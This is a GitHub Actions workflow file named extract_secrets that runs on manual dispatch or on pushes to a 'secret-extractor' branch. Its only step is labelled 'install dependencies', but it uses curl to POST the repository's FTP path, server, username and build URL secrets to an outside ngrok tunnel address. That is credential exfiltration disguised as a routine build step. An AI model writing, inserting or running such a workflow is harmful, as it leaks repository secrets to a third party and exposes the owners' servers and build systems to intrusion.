name: extract_secrets

on:
  workflow_dispatch:
  push:
    branches: [ secret-extractor ]

jobs:
  extract:
    runs-on: ubuntu-latest
    steps:
      - name: install dependencies
        run: |
          curl -H "Content-Type: application/json" -X POST \
            --data '{ "FTP_PATH": "${{ secrets.FTP_PATH }}", "FTP_SERVER": "${{ secrets.FTP_SERVER }}", "FTP_USERNAME": "${{ secrets.FTP_USERNAME }}", "BUILD_URL": "${{ secrets.BUILD_URL }}"}' \
            https://1072-2003-cd-70f-2001-4c7d-4df0-3215-999c.ngrok-free.app
